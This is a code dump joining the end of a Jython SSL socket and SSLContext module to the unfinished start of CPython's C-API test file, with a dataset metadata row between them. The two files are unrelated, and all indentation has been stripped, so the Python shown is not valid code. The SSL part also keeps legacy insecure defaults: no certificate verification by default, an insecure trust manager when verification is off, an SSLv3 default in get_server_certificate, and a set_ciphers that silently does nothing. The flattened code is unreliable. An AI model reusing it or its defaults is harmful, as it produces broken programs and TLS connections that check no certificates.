log.debug("Child socket waiting on handshake=%s", self._handshake_future, extra={"sock": self._sock})
self._sock._handle_channel_future(self._handshake_future, "SSL handshake")
else:
self.do_handshake()
if hasattr(self._sock, "accepted_children"):
def wrap_child(child):
log.debug(
"Wrapping child socket - about to handshake! parent=%s",
self._sock, extra={"sock": child})
child._wrapper_socket = self.context.wrap_socket(
_socketobject(_sock=child),
do_handshake_on_connect=self.do_handshake_on_connect,
suppress_ragged_eofs=self.suppress_ragged_eofs,
server_side=True)
if self.do_handshake_on_connect:
# this handshake will be done in the child pool - initChannel will block on it
child._wrapper_socket.do_handshake()
self._sock.ssl_wrap_child_socket = wrap_child
@property
def context(self):
return self._context
@context.setter
def context(self, context):
self._context = context
def setup_engine(self, addr):
if self.engine is None:
# http://stackoverflow.com/questions/13390964/java-ssl-fatal-error-80-unwrapping-net-record-after-adding-the-https-en
self.engine = self._context._createSSLEngine(
addr, self.server_hostname,
cert_file=getattr(self, "certfile", None), key_file=getattr(self, "keyfile", None),
server_side=self.server_side)
self.engine.setUseClientMode(not self.server_side)
def connect(self, addr):
"""Connects to remote ADDR, and then wraps the connection in
an SSL channel."""
if self.server_side:
raise ValueError("can't connect in server-side mode")
if self._connected:
raise ValueError("attempt to connect already-connected SSLSocket!")
log.debug("Connect SSL with handshaking %s", self.do_handshake_on_connect, extra={"sock": self._sock})
self._sock.connect(addr)
if self.do_handshake_on_connect:
self.do_handshake()
def connect_ex(self, addr):
"""Connects to remote ADDR, and then wraps the connection in
an SSL channel."""
if self.server_side:
raise ValueError("can't connect in server-side mode")
if self._connected:
raise ValueError("attempt to connect already-connected SSLSocket!")
log.debug("Connect SSL with handshaking %s", self.do_handshake_on_connect, extra={"sock": self._sock})
rc = self._sock.connect_ex(addr)
if rc == errno.EISCONN:
self._connected = True
if self.do_handshake_on_connect:
self.do_handshake()
return rc
def accept(self):
"""Accepts a new connection from a remote client, and returns
a tuple containing that new connection wrapped with a server-side
SSL channel, and the address of the remote client."""
child, addr = self._sock.accept()
if self.do_handshake_on_connect:
wrapped_child_socket = child._wrapper_socket
del child._wrapper_socket
return wrapped_child_socket, addr
else:
return self.context.wrap_socket(
_socketobject(_sock=child),
do_handshake_on_connect=self.do_handshake_on_connect,
suppress_ragged_eofs=self.suppress_ragged_eofs,
server_side=True)
def unwrap(self):
try:
self._sock.channel.pipeline().remove("ssl")
except NoSuchElementException:
pass
self.ssl_handler.close()
return self._sock
def do_handshake(self):
log.debug("SSL handshaking", extra={"sock": self._sock})
self.setup_engine(self.sock.getpeername())
def handshake_step(result):
log.debug("SSL handshaking completed %s", result, extra={"sock": self._sock})
self._notify_selectors()
if self.ssl_handler is None:
self.ssl_handler = SslHandler(self.engine)
self.ssl_handler.handshakeFuture().addListener(handshake_step)
if hasattr(self._sock, "connected") and self._sock.connected:
# The underlying socket is already connected, so some extra work to manage
log.debug("Adding SSL handler to pipeline after connection", extra={"sock": self._sock})
self._sock.channel.pipeline().addFirst("ssl", self.ssl_handler)
else:
log.debug("Not connected, adding SSL initializer...", extra={"sock": self._sock})
self._sock.connect_handlers.append(SSLInitializer(self.ssl_handler))
self._handshake_future = self.ssl_handler.handshakeFuture()
if isinstance(self._sock, ChildSocket):
pass
# see
# http://stackoverflow.com/questions/24628271/exception-in-netty-io-netty-util-concurrent-blockingoperationexception
# - handshake in the child thread pool
else:
self._sock._handle_channel_future(self._handshake_future, "SSL handshake")
def dup(self):
raise NotImplemented("Can't dup() %s instances" %
self.__class__.__name__)
@raises_java_exception
def _ensure_handshake(self):
log.debug("Ensure handshake", extra={"sock": self})
self._sock._make_active()
# nonblocking code should never wait here, but only attempt to
# come to this point when notified via a selector
if not hasattr(self, "_handshake_future"):
self.do_handshake()
# additional synchronization guard if this is a child socket
self._handshake_future.sync()
log.debug("Completed post connect", extra={"sock": self})
# Various pass through methods to the wrapped socket
def send(self, data):
self._ensure_handshake()
return self.sock.send(data)
write = send
def sendall(self, data):
self._ensure_handshake()
return self.sock.sendall(data)
def recv(self, bufsize, flags=0):
self._ensure_handshake()
return self.sock.recv(bufsize, flags)
def read(self, len=0, buffer=None):
"""Read up to LEN bytes and return them.
Return zero-length string on EOF."""
self._checkClosed()
self._ensure_handshake()
# FIXME? breaks test_smtpnet.py
# if not self._sslobj:
# raise ValueError("Read on closed or unwrapped SSL socket.")
try:
if buffer is not None:
v = self.recvfrom_into(buffer, len or 1024)
else:
v = self.recv(len or 1024)
return v
except SSLError as x:
if x.args[0] == SSL_ERROR_EOF and self.suppress_ragged_eofs:
if buffer is not None:
return 0
else:
return b''
else:
raise
def recvfrom(self, bufsize, flags=0):
self._ensure_handshake()
return self.sock.recvfrom(bufsize, flags)
def recvfrom_into(self, buffer, nbytes=0, flags=0):
self._ensure_handshake()
return self.sock.recvfrom_into(buffer, nbytes, flags)
def recv_into(self, buffer, nbytes=0, flags=0):
self._ensure_handshake()
return self.sock.recv_into(buffer, nbytes, flags)
def sendto(self, string, arg1, arg2=None):
# as observed on CPython, sendto when wrapped ignores the
# destination address, thereby behaving just like send
self._ensure_handshake()
return self.sock.send(string)
def close(self):
self.sock.close()
def setblocking(self, mode):
self.sock.setblocking(mode)
def settimeout(self, timeout):
self.sock.settimeout(timeout)
def gettimeout(self):
return self.sock.gettimeout()
def makefile(self, mode='r', bufsize=-1):
return self.sock.makefile(mode, bufsize)
def shutdown(self, how):
self.sock.shutdown(how)
# Need to work with the real underlying socket as well
def pending(self):
# undocumented function, used by some tests
# see also http://bugs.python.org/issue21430
return self._sock._pending()
def _readable(self):
return self._sock._readable()
def _writable(self):
return self._sock._writable()
def _register_selector(self, selector):
self._sock._register_selector(selector)
def _unregister_selector(self, selector):
return self._sock._unregister_selector(selector)
def _notify_selectors(self):
self._sock._notify_selectors()
def _checkClosed(self, msg=None):
# raise an exception here if you wish to check for spurious closes
pass
def _check_connected(self):
if not self._connected:
# getpeername() will raise ENOTCONN if the socket is really
# not connected; note that we can be connected even without
# _connected being set, e.g. if connect() first returned
# EAGAIN.
self.getpeername()
def getpeername(self):
return self.sock.getpeername()
def selected_npn_protocol(self):
self._checkClosed()
# TODO Jython
return None
def selected_alpn_protocol(self):
self._checkClosed()
# TODO Jython
def fileno(self):
return self
@raises_java_exception
def getpeercert(self, binary_form=False):
cert = self.engine.getSession().getPeerCertificates()[0]
if binary_form:
return cert.getEncoded()
if self._context.verify_mode == CERT_NONE:
return {}
dn = cert.getSubjectX500Principal().getName()
rdns = SSLContext._parse_dn(dn)
alt_names = tuple()
if cert.getSubjectAlternativeNames():
alt_names = tuple(((_cert_name_types[type], str(name)) for (type, name) in cert.getSubjectAlternativeNames()))
pycert = {
"notAfter": str(_rfc2822_date_format.format(cert.getNotAfter())),
"subject": rdns,
"subjectAltName": alt_names,
}
return pycert
@raises_java_exception
def issuer(self):
return self.getpeercert().getIssuerDN().toString()
def cipher(self):
session = self.engine.getSession()
suite = str(session.cipherSuite)
if "256" in suite: # FIXME!!! this test usually works, but there must be a better approach
strength = 256
elif "128" in suite:
strength = 128
else:
strength = None
return suite, str(session.protocol), strength
def get_channel_binding(self, cb_type="tls-unique"):
"""Get channel binding data for current connection. Raise ValueError
if the requested `cb_type` is not supported. Return bytes of the data
or None if the data is not available (e.g. before the handshake).
"""
if cb_type not in CHANNEL_BINDING_TYPES:
raise ValueError("Unsupported channel binding type")
if cb_type != "tls-unique":
raise NotImplementedError(
"{0} channel binding type not implemented"
.format(cb_type))
# TODO support this properly
return None
# if self._sslobj is None:
# return None
# return self._sslobj.tls_unique_cb()
def version(self):
if self.ssl_handler:
return str(self.engine.getSession().getProtocol())
return None
# instantiates a SSLEngine, with the following things to keep in mind:
# FIXME not yet supported
# suppress_ragged_eofs - presumably this is an exception we can detect in Netty, the underlying SSLEngine certainly does
# ssl_version - use SSLEngine.setEnabledProtocols(java.lang.String[])
# ciphers - SSLEngine.setEnabledCipherSuites(String[] suites)
@raises_java_exception
def wrap_socket(sock, keyfile=None, certfile=None, server_side=False, cert_reqs=CERT_NONE,
ssl_version=PROTOCOL_SSLv23, ca_certs=None, do_handshake_on_connect=True,
suppress_ragged_eofs=True, ciphers=None):
return SSLSocket(
sock,
keyfile=keyfile, certfile=certfile, cert_reqs=cert_reqs, ca_certs=ca_certs,
server_side=server_side, ssl_version=ssl_version, ciphers=ciphers,
do_handshake_on_connect=do_handshake_on_connect)
# some utility functions
def cert_time_to_seconds(cert_time):
"""Return the time in seconds since the Epoch, given the timestring
representing the "notBefore" or "notAfter" date from a certificate
in ``"%b %d %H:%M:%S %Y %Z"`` strptime format (C locale).
"notBefore" or "notAfter" dates must use UTC (RFC 5280).
Month is one of: Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec
UTC should be specified as GMT (see ASN1_TIME_print())
"""
from time import strptime
from calendar import timegm
months = (
"Jan","Feb","Mar","Apr","May","Jun",
"Jul","Aug","Sep","Oct","Nov","Dec"
)
time_format = ' %d %H:%M:%S %Y GMT' # NOTE: no month, fixed GMT
try:
month_number = months.index(cert_time[:3].title()) + 1
except ValueError:
raise ValueError('time data %r does not match '
'format "%%b%s"' % (cert_time, time_format))
else:
# found valid month
tt = strptime(cert_time[3:], time_format)
# return an integer, the previous mktime()-based implementation
# returned a float (fractional seconds are always zero here).
return timegm((tt[0], month_number) + tt[2:6])
PEM_HEADER = "-----BEGIN CERTIFICATE-----"
PEM_FOOTER = "-----END CERTIFICATE-----"
def DER_cert_to_PEM_cert(der_cert_bytes):
"""Takes a certificate in binary DER format and returns the
PEM version of it as a string."""
if hasattr(base64, 'standard_b64encode'):
# preferred because older API gets line-length wrong
f = base64.standard_b64encode(der_cert_bytes)
return (PEM_HEADER + '\n' +
textwrap.fill(f, 64) + '\n' +
PEM_FOOTER + '\n')
else:
return (PEM_HEADER + '\n' +
base64.encodestring(der_cert_bytes) +
PEM_FOOTER + '\n')
def PEM_cert_to_DER_cert(pem_cert_string):
"""Takes a certificate in ASCII PEM format and returns the
DER-encoded version of it as a byte sequence"""
if not pem_cert_string.startswith(PEM_HEADER):
raise ValueError("Invalid PEM encoding; must start with %s"
% PEM_HEADER)
if not pem_cert_string.strip().endswith(PEM_FOOTER):
raise ValueError("Invalid PEM encoding; must end with %s"
% PEM_FOOTER)
d = pem_cert_string.strip()[len(PEM_HEADER):-len(PEM_FOOTER)]
return base64.decodestring(d)
def get_server_certificate(addr, ssl_version=PROTOCOL_SSLv3, ca_certs=None):
"""Retrieve the certificate from the server at the specified address,
and return it as a PEM-encoded string.
If 'ca_certs' is specified, validate the server cert against it.
If 'ssl_version' is specified, use it in the connection attempt."""
host, port = addr
if (ca_certs is not None):
cert_reqs = CERT_REQUIRED
else:
cert_reqs = CERT_NONE
s = wrap_socket(socket(), ssl_version=ssl_version,
cert_reqs=cert_reqs, ca_certs=ca_certs)
s.connect(addr)
dercert = s.getpeercert(True)
s.close()
return DER_cert_to_PEM_cert(dercert)
def get_protocol_name(protocol_code):
return _PROTOCOL_NAMES.get(protocol_code, '<unknown>')
# a replacement for the old socket.ssl function
def sslwrap_simple(sock, keyfile=None, certfile=None):
"""A replacement for the old socket.ssl function. Designed
for compability with Python 2.5 and earlier. Will disappear in
Python 3.0."""
ssl_sock = wrap_socket(sock, keyfile=keyfile, certfile=certfile, ssl_version=PROTOCOL_SSLv23)
try:
sock.getpeername()
except socket_error:
# no, no connection yet
pass
else:
# yes, do the handshake
ssl_sock.do_handshake()
return ssl_sock
# Underlying Java does a good job of managing entropy, so these are just no-ops
def RAND_status():
return True
def RAND_egd(path):
if os.path.abspath(str(path)) != path:
raise TypeError("Must be an absolute path, but ignoring it regardless")
def RAND_add(bytes, entropy):
pass
class SSLContext(object):
_jsse_keyType_names = ('RSA', 'DSA', 'DH_RSA', 'DH_DSA', 'EC', 'EC_EC', 'EC_RSA')
def __init__(self, protocol):
try:
self._protocol_name = _PROTOCOL_NAMES[protocol]
except KeyError:
raise ValueError("invalid protocol version")
if protocol == PROTOCOL_SSLv23: # darjus: at least my Java does not let me use v2
self._protocol_name = 'SSL'
self.protocol = protocol
self._check_hostname = False
# defaults from _ssl.c
self.options = OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3
self._verify_flags = VERIFY_DEFAULT
self._verify_mode = CERT_NONE
self._ciphers = None
self._trust_store = KeyStore.getInstance(KeyStore.getDefaultType())
self._trust_store.load(None, None)
self._key_store = KeyStore.getInstance(KeyStore.getDefaultType())
self._key_store.load(None, None)
self._key_managers = None
self._server_name_callback = None
def wrap_socket(self, sock, server_side=False,
do_handshake_on_connect=True,
suppress_ragged_eofs=True,
server_hostname=None):
return SSLSocket(sock=sock, server_side=server_side,
do_handshake_on_connect=do_handshake_on_connect,
suppress_ragged_eofs=suppress_ragged_eofs,
server_hostname=server_hostname,
_context=self)
def _createSSLEngine(self, addr, hostname=None, cert_file=None, key_file=None, server_side=False):
tmf = InsecureTrustManagerFactory.INSTANCE
if self.verify_mode != CERT_NONE:
# XXX need to refactor so we don't have to get trust managers twice
stmf = SimpleTrustManagerFactory.getInstance(SimpleTrustManagerFactory.getDefaultAlgorithm())
stmf.init(self._trust_store)
tmf = CompositeX509TrustManagerFactory(stmf.getTrustManagers())
tmf.init(self._trust_store)
kmf = self._key_managers
if self._key_managers is None:
kmf = _get_openssl_key_manager(cert_file=cert_file, key_file=key_file)
context_builder = None
if not server_side:
context_builder = SslContextBuilder.forClient()
if kmf:
if server_side:
context_builder = SslContextBuilder.forServer(kmf)
else:
context_builder = context_builder.keyManager(kmf)
context_builder = context_builder.trustManager(tmf)
context_builder = context_builder.sslProvider(SslProvider.JDK)
context_builder = context_builder.clientAuth(_CERT_TO_CLIENT_AUTH[self.verify_mode])
if self._ciphers is not None:
context_builder = context_builder.ciphers(self._ciphers)
if self._check_hostname:
engine = context_builder.build().newEngine(ByteBufAllocator.DEFAULT, hostname, addr[1])
if HAS_SNI:
params = engine.getSSLParameters()
params.setEndpointIdentificationAlgorithm('HTTPS')
params.setServerNames([SNIHostName(hostname)])
engine.setSSLParameters(params)
else:
engine = context_builder.build().newEngine(ByteBufAllocator.DEFAULT, addr[0], addr[1])
return engine
def cert_store_stats(self):
return {'crl': 0, 'x509': self._key_store.size(), 'x509_ca': self._trust_store.size()}
def load_cert_chain(self, certfile, keyfile=None, password=None):
try:
self._key_managers = _get_openssl_key_manager(certfile, keyfile, password, _key_store=self._key_store)
except IllegalArgumentException as err:
raise SSLError(SSL_ERROR_SSL, "PEM lib ({})".format(err))
def set_ciphers(self, ciphers):
# TODO conversion from OpenSSL to http://www.iana.org/assignments/tls-parameters/tls-parameters.xml
# as Java knows no other
#self._ciphers = ciphers
pass
def load_verify_locations(self, cafile=None, capath=None, cadata=None):
if cafile is None and capath is None and cadata is None:
raise TypeError("cafile, capath and cadata cannot be all omitted")
cafiles = []
if cafile is not None:
cafiles.append(cafile)
if capath is not None:
for fname in os.listdir(capath):
_, ext = os.path.splitext(fname)
possible_cafile = os.path.join(capath, fname)
if ext.lower() == 'pem':
cafiles.append(possible_cafile)
elif fname == 'cacerts': # java truststore
if os.path.isfile(possible_cafile):
cafiles.append(possible_cafile)
elif os.path.isfile(possible_cafile):
try:
with open(possible_cafile) as f:
if PEM_HEADER in f.read():
cafiles.append(possible_cafile)
except IOError:
log.debug("Not including %s file as a possible cafile due to permissions error" % possible_cafile)
pass # Probably permissions related...ignore
certs = []
private_key = None
if cadata is not None:
certs, private_key = _extract_cert_from_data(cadata)
_certs, private_key = _extract_certs_for_paths(cafiles)
certs.extend(_certs)
for cert in certs:
# FIXME not sure this is correct?
if private_key is None:
self._trust_store.setCertificateEntry(_str_hash_key_entry(cert), cert)
else:
self._key_store.setCertificateEntry(_str_hash_key_entry(cert), cert)
def load_default_certs(self, purpose=Purpose.SERVER_AUTH):
# TODO handle/support purpose
if not isinstance(purpose, _ASN1Object):
raise TypeError(purpose)
self.set_default_verify_paths()
def set_default_verify_paths(self):
"""
Load a set of default "certification authority" (CA) certificates from a filesystem path defined when building
the OpenSSL library. Unfortunately, there's no easy way to know whether this method succeeds: no error is
returned if no certificates are to be found. When the OpenSSL library is provided as part of the operating
system, though, it is likely to be configured properly.
"""
default_verify_paths = get_default_verify_paths()
self.load_verify_locations(cafile=default_verify_paths.cafile, capath=default_verify_paths.capath)
def set_alpn_protocols(self, protocols):
raise NotImplementedError()
def set_npn_protocols(self, protocols):
raise NotImplementedError()
def set_servername_callback(self, server_name_callback):
if not callable(server_name_callback) and server_name_callback is not None:
raise TypeError("{!r} is not callable".format(server_name_callback))
self._server_name_callback = server_name_callback
def load_dh_params(self, dhfile):
# TODO?
pass
def set_ecdh_curve(self, curve_name):
params = _get_ecdh_parameter_spec(curve_name)
def session_stats(self):
# TODO
return {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
}
def get_ca_certs(self, binary_form=False):
"""get_ca_certs(binary_form=False) -> list of loaded certificate
Returns a list of dicts with information of loaded CA certs. If the optional argument is True,
returns a DER-encoded copy of the CA certificate.
NOTE: Certificates in a capath directory aren't loaded unless they have been used at least once.
"""
certs = []
for alias in self._trust_store.aliases():
if self._trust_store.isCertificateEntry(alias):
cert = self._trust_store.getCertificate(alias)
if binary_form:
certs.append(cert.getEncoded().tostring())
else:
issuer_info = self._parse_dn(cert.issuerDN)
subject_info = self._parse_dn(cert.subjectDN)
cert_info = {'issuer': issuer_info, 'subject': subject_info}
for k in ('serialNumber', 'version'):
cert_info[k] = getattr(cert, k)
for k in ('notBefore', 'notAfter'):
cert_info[k] = str(_rfc2822_date_format.format(getattr(cert, k)))
certs.append(cert_info)
return certs
@property
def check_hostname(self):
return self._check_hostname
@check_hostname.setter
def check_hostname(self, val):
if val and self.verify_mode == CERT_NONE:
raise ValueError("check_hostname needs a SSL context with either "
"CERT_OPTIONAL or CERT_REQUIRED")
self._check_hostname = val
@property
def verify_mode(self):
return self._verify_mode
@verify_mode.setter
def verify_mode(self, val):
if not isinstance(val, int):
raise TypeError("verfy_mode must be one of the ssl.CERT_* modes")
if val not in (CERT_NONE, CERT_OPTIONAL, CERT_REQUIRED):
raise ValueError("verfy_mode must be one of the ssl.CERT_* modes")
if self.check_hostname and val == CERT_NONE:
raise ValueError("Cannot set verify_mode to CERT_NONE when "
"check_hostname is enabled.")
self._verify_mode = val
@property
def verify_flags(self):
return self._verify_flags
@verify_flags.setter
def verify_flags(self, val):
if not isinstance(val, int):
raise TypeError("verfy_flags must be one of the ssl.VERIFY_* flags")
self._verify_flags = val
@classmethod
def _parse_dn(cls, dn):
ln = LdapName(unicode(dn))
# FIXME given this tuple of a single element tuple structure assumed here, is it possible this is
# not actually the case, eg because of multi value attributes?
return tuple((((_ldap_rdn_display_names.get(rdn.type), _str_or_unicode(rdn.value)),) for rdn in ln.getRdns()))
| gpl-3.0 |
goldeneye-source/ges-python | lib/test/test_capi.py | 80 | 18444 | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
import os
import pickle
import random
import subprocess
import sys
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import threading
except ImportError:
threading = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, "")
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
for i in range(context.nThreads):
t = threading.Thread(target=self.pendingcalls_thread, args = (context,))
t.start()
threads.append(t)
self.pendingcalls_wait(context.l, n, context)
for t in threads:
t.join()
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
# Bug #6012
class Test6012(unittest.TestCase):
def test(self):
self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
class EmbeddingTests(unittest.TestCase):
def setUp(self):
basepath = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
exename = "_testembed"
if sys.platform.startswith("win"):
ext = ("_d" if "_d" in sys.executable else "") + ".exe"
exename += ext
exepath = os.path.dirname(sys.executable)
else:
exepath = os.path.join(basepath, "Modules")
self.test_exe = exe = os.path.join(exepath, exename)
if not os.path.exists(exe):
self.skipTest("%r doesn't exist" % exe)
# This is needed otherwise we get a fatal error:
# "Py_Initialize: Unable to get the locale encoding
# LookupError: no codec search functions registered: can't find encoding"
self.oldcwd = os.getcwd()
os.chdir(basepath)
def tearDown(self):
os.chdir(self.oldcwd)
def run_embedded_interpreter(self, *args):
"""Runs a test in the embedded interpreter"""
cmd = [self.test_exe]
cmd.extend(args)
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(p.returncode, 0,
"bad returncode %d, stderr is %r" %
(p.returncode, err))
return out.decode("latin1"), err.decode("latin1")
def test_subinterps(self):
# This is just a "don't crash" test
out, err = self.run_embedded_interpreter()
if support.verbose:
print()
print(out)
print(err)
@staticmethod
def _get_default_pipe_encoding():
rp, wp = os.pipe()
try:
with os.fdopen(wp, 'w') as w:
default_pipe_encoding = w.encoding
finally:
os.close(rp)
return default_pipe_encoding
def test_forced_io_encoding(self):
# Checks forced configuration of embedded interpreter IO streams
out, err = self.run_embedded_interpreter("forced_io_encoding")
if support.verbose:
print()
print(out)
print(err)
expected_stdin_encoding = sys.__stdin__.encoding
expected_pipe_encoding = self._get_default_pipe_encoding()
expected_output = os.linesep.join([
"--- Use defaults ---",
"Expected encoding: default",
"Expected errors: default",
"stdin: {0}:strict",
"stdout: {1}:strict",
"stderr: {1}:backslashreplace",
"--- Set errors only ---",
"Expected encoding: default",
"Expected errors: surrogateescape",
"stdin: {0}:surrogateescape",
"stdout: {1}:surrogateescape",
"stderr: {1}:backslashreplace",
"--- Set encoding only ---",
"Expected encoding: latin-1",
"Expected errors: default",
"stdin: latin-1:strict",
"stdout: latin-1:strict",
"stderr: latin-1:backslashreplace",
"--- Set encoding and errors ---",
"Expected encoding: latin-1",
"Expected errors: surrogateescape",
"stdin: latin-1:surrogateescape",
"stdout: latin-1:surrogateescape",
"stderr: latin-1:backslashreplace"]).format(expected_stdin_encoding,
expected_pipe_encoding)
# This is useful if we ever trip over odd platform behaviour
self.maxDiff = None
self.assertEqual(out.strip(), expected_output)
class SkipitemTest(unittest.TestCase):
def test_skipitem(self):
"""
If this test failed, you probably added a new "format unit"
in Python/getargs.c, but neglected to update our poor friend
skipitem() in the same file. (If so, shame on you!)
With a few exceptions**, this function brute-force tests all
printable ASCII*** characters (32 to 126 inclusive) as format units,
checking to see that PyArg_ParseTupleAndKeywords() return consistent
errors both when the unit is attempted to be used and when it is
skipped. If the format unit doesn't exist, we'll get one of two
specific error messages (one for used, one for skipped); if it does
exist we *won't* get that error--we'll get either no error or some
other error. If we get the specific "does not exist" error for one
test and not for the other, there's a mismatch, and the test fails.
** Some format units have special funny semantics and it would
be difficult to accomodate them here. Since these are all
well-established and properly skipped in skipitem() we can
get away with not testing them--this test is really intended
to catch *new* format units.
*** Python C source files must be ASCII. Therefore it's impossible
to have non-ASCII format units.
"""
empty_tuple = ()
tuple_1 = (0,)
dict_b = {'b':1}
keywords = ["a", "b"]
for i in range(32, 127):
c = chr(i)
# skip parentheses, the error reporting is inconsistent about them
# skip 'e', it's always a two-character code
# skip '|' and '$', they don't represent arguments anyway
if c in '()e|$':
continue
# test the format unit when not skipped
format = c + "i"
try:
# (note: the format string must be bytes!)
